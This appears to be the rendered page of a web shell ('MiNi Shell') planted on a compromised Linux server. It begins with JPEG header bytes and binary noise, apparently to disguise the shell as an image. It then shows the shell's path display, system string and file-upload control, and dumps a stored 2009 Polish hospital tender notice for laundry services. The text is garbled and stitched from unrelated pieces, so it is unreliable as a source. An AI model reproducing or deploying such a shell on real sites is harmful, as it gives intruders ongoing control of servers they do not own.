JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090310/56058-N-2009.html

<p class="kh_header"><b>Włocławek: DIZ - 1 - 2009 Świadczenie usług pralniczych w zakresie prania bielizny szpitalnej</b><br>
<b>Numer ogłoszenia: 56058 - 2009; data zamieszczenia: 10.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki , ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 412-94-32, faks 054 4129432.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DIZ - 1 - 2009 Świadczenie usług pralniczych w zakresie prania bielizny szpitalnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie usługi polegającej na praniu bielizny szpitalnej w ilościach wynikających z bieżących potrzeb Zamawiającego w następującym asortymencie:
l.p.	Rodzaj bielizny	szacunkowa max. ilość pranej bielizny w skali  1 m-ca
1	Czepki operacyjne męskie	64 sztuki
2	Fartuchy rozpinane	            121 sztuk
3	Fartuchy operacyjne	329 sztuk
4	Fartuchy operacyjne MERTEX 1,2, Plus, firmy  GARMEX	546 sztuk
5	Koszule operacyjne	            316 sztuk
6	Firany	                           40 sztuk
7	Śpiochy	                          282 sztuk
8	Kaftaniki noworodkowe 	281 sztuk
9	Koce małe	             160 sztuk
10	Koce  duże	             163 sztuk
11	Materace gąbkowe	                2 sztuki
12	Mop-y	                            30 sztuk
13	Nogawice operacyjne	   4 sztuki
14	Obrusy	                           61 sztuk
15         PIDŻAMY :
	a. bluza	                          478 sztuk
	b. spodnie	             391 sztuk
16	Pieluchy tetrowe	               37 sztuk
17	Podkłady  podgumowane 	    5 sztuk
18	Podkłady	                          245 sztuk
19	Poduszki z pierza lub z wkładem syntetycznym	67 sztuk
20	Parawany materiałowe	  23 sztuki
21	Powłoczki na poduszkę  kolorowe noworodkowe 	1249 sztuk
22	Poduszka -Jasiek- z tworzywa syntetycznego	6 sztuk
23	Kołderka mała z tworzywa syntetycznego	3 sztuki
24	Sweterki dziecięce	2 sztuki
25	Pokrowce na materace -EKOLASTIC	127 sztuk
26	Worki materiałowe	52 sztuki
27	Zasłony	15 sztuk
28	Pokrowce  materiałowe na materace 	5 sztuk
29	Pokrowce materiałowe na wałek operacyjny lub na mikroskop   7 sztuk
30	Pokrowce na przewody	3 sztuki
31	Pokrowce na stoliki  operacyjne  	100 sztuk
32	Powłoczka na poduszkę	4225 sztuk
33	Poszwa	4994 sztuk
34	Poszwa dziecięca	303 sztuk
35	Prześcieradła operacyjne	690 sztuk
36	Prześcieradła	5937 sztuk
37	Ręczniki	545 sztuk
38	Serwety operacyjne	1990 sztuk
39	Szlafroki  duże	5 sztuk
40	Ścierki kuchenne	124 sztuk
41	UBRANIA OPERACYJNE
	a. bluza	1073 sztuki
	b. spodnie	801 sztuk
	c. spódnica	90 sztuk
	d. sukienka	30 sztuk
42	Ubrania operacyjne  wielokrotnego użytku - MEDITEX
	a. bluza	             100 sztuk
	b. spodnie	100 sztuk
43	UBRANIA PERSONELU
	a. bluza	136 sztuk
	b. spodnie	24 sztuki
	c. spódnica	49 sztuk
44	UBRANIA ROBOCZE
	a. bluza	3 sztuki
	b. spodnie	2 sztuki
	c. koszula	3 sztuki.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.72.11.00-0, 93.10.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść,  wadium  w  wysokości :  20 880,00 zł. (słownie:  dwadzieścia  tysięcy  osiemset osiemdziesiąt złotych), obejmującej  całość   Przedmiotu  Zamówienia.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności , jeśli ustawy  nakładają  obowiązek posiadania takich uprawnień tj.:
-  prowadzą działalność gospodarczą w zakresie świadczenia usług pralniczych dla 
   placówek ochrony zdrowia
   Wykonawca, który nie prowadzi działalności w ww. branży zostanie wykluczony z  postępowania.

2 . posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i   osobami zdolnymi do wykonania zamówienia tj. 
- doświadczenia w zakresie świadczenia usługi w zakresie prania bielizny szpitalnej 
  lub przedstawią pisemne, zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia

3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia

4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na  podstawie art. 24 ust. 1 i 2 ustawy pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca ubiegający się o udzielenie zamówienie publicznego zobowiązany jest do złożenia niżej wymienionych dokumentów:

a) wypełniony i podpisany -Formularz oferty-, wg. Załącznika nr 1 do SIWZ;
b) oświadczenie o spełnieniu warunków udziału w postępowaniu, wg. Załącznika nr 2 do  SIWZ;
c) oświadczenie o zapoznaniu się z niektórymi przepisami, wg. Załącznika nr 3 do SIWZ;
d) oświadczenie o zapoznaniu się ze Specyfikacją Istotnych Warunków Zamówienia, wg.  Załącznika nr 4 ;
e) zaakceptowany i podpisany projekt umowy stanowiący Załącznik nr 5 do SIWZ;
f) pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów  rejestracyjnych)  w przypadku podpisywania oferty przez osobę nie wpisaną do dokumentów  rejestracyjnych ;  
g) upoważnienie do podpisania Oferty (fakultatywnie).

2. Celem potwierdzenia spełnienia warunku określonego w rozdziale V pkt 1 zamawiający żąda następujących dokumentów:

a) koncesja  zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek ich posiadania na podjęcie działalności gospodarczej w zakresie objętym zamówieniem 
b) aktualny odpis z właściwego rejestru, albo zaświadczenie o wpisie do ewidencji  działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem  terminu składania ofert;
c) aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego albo składania ofert,
d) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt   4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
e) aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,

3.  Celem potwierdzenia spełnienia warunków określonego w rozdziale V pkt 2 zamawiający żąda złożenia następujących dokumentów:

a) wykaz  wykonania z należytą starannością w okresie ostatnich 3 lat ( jeśli okres prowadzenia  działalności jest krótszy - w tym okresie), przed dniem wszczęcia postępowania - co  najmniej 3 usług o charakterze i złożoności porównywalnej z przedmiotem zamówienia  wykonane za łączną kwotę 100 000,00 zł brutto wraz z  załączeniem dokumentów potwierdzających należyte ich wykonanie lub wykonywanie, wg. Załącznika nr 6  do SIWZ

b) wykaz  maszyn pralniczych  i maszyn do dezynfekcji bielizny szpitalnej , które Wykonawca dysponuje lub będzie dysponował o łącznym przerobie minimum  20 000 kg na miesiąc. 
Zamawiający wymaga aby maszyny pralnicze wyposażone były w automatyczne systemy  dozujące środki piorące i dezynfekcyjne oraz urządzenia kontrolujące parametry procesu prania i dezynfekcji, wg Załącznika nr 7 do SIWZ

c) pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń (jeżeli dotyczy)

d) wykaz środków transportu, jakie Wykonawca posiada i  jakimi dysponuje, a które przeznaczone będą do transportu bielizny  szpitalnej z zachowaniem wymaganej bariery higienicznej oraz ustalonych procedur dezynfekcji środków transportu, wraz z załączeniem aktualnego  pozwolenia Państwowego Inspektora Sanitarnego na świadczenie tego typu usług, wg Załącznika nr 8 do SIWZ;

e) władanie  przez  Wykonawcę pomieszczeniami, w których będzie  wykonane zamówienie; w przypadku władania o inny tytuł prawny iż własność-umowa, której przedmiotem jest władanie  pomieszczeniami zawarta  musi być na dzień otwarcia ofert na okres nie krótszy niż do dnia  zakończenia umowy, wg Załącznika nr 9 do SIWZ;

4.  Celem potwierdzenia spełnienia warunków określonego w rozdziale V pkt 3 zamawiający żąda złożenia następujących dokumentów:

a) polisy lub innego dokumentu  ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony od  odpowiedzialności cywilnej deliktowej i kontraktowej w zakresie wykonywanej działalności gospodarczej, z dowodem  zapłaty składki z tytułu zawarcia umowy ubezpieczenia. Wysokość ubezpieczenia  z tytułu winna  wynosić  łącznie minimum 500 000,00 zł.

5. Celem potwierdzenia, że oferowane usługi, odpowiadają opisowi przedmiotu zamówienia zamawiający żąda:

a) oświadczenia Wykonawcy, że  usługa, o której mowa w Rozdziale III pkt 1 wykonywana będzie wyłącznie przy użyciu badanych i atestowanych środków piorących i dezynfekcyjnych dopuszczonych do obrotu  

b) wykaz środków piorąco-dezynfekujących , które Wykonawca będzie używał do wykonywania usługi wraz z atestem PZH lub innej uznanej jednostki opiniującej i/lub badającej w kraju  producenta.   (Jeśli producentem jest jednostka zagraniczna, dokumenty muszą być przetłumaczone na język polski przez tłumacza przysięgłego)

c) wykaz środków piorąco-dezynfekujących, które Wykonawca będzie używał do wykonania usługi prania bielizny noworodkowej, niemowlęcej i dziecięcej wraz z  pozytywną opinią Instytutu Matki i Dziecka dotyczącą wykazanych środków.

d) wykaz stosowanych do prania i dezynfekcji środków piorąco-dezynfekujących posiadających wpis w Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych na produkty przeznaczone do dezynfekcji bielizny i dopuszczone do obrotu zgodnie z ustawą z dnia 13 września 2002 r. o produktach biobójczych (Dz. U.2007r., Nr 39, poz. 252).

e) opis technologii prania oraz dezynfekcji  bielizny sporządzony wg. Załącznika nr 10 do SIWZ;

f) pozytywna opinia Inspektora Sanitarnego, że pralnia , środki piorąco-dezynfekujące i forma transportu spełniają wymogi sanitarno-techniczne wynikające z Rozporządzenia MZ i OS z dn. 10.11.2006 (Dz. U. 2006r.,  Nr 213, poz. 1568) w sprawie wymagań jakim powinny odpowiadać pod  względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej ) oraz dopuszczająca Wykonawcę do wykonywania  usług pralniczych dla szpitali;

Wszystkie dokumenty należy złożyć w oryginale lub w postaci kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do podpisania oferty.

Jeżeli wykonawca składa dokumenty stanowiące tajemnicę firmy w rozumieniu ustawy o zwalczaniu nieuczciwej konkurencji, winny być opatrzone napisem  -TAJNE- .W tym celu należy również wypełnić Załącznik nr 11 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.wloclawek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki, ul. Wieniecka 49,  87-800 Włocławek, pokój 303 (budynek   
 administracji, pokój 303).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2009 godzina 10:00, miejsce: Szpital Wojewódzki, ul. Wieniecka 49,  87-800 Włocławek, pokój 303 (budynek   
 administracji, pokój 303).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com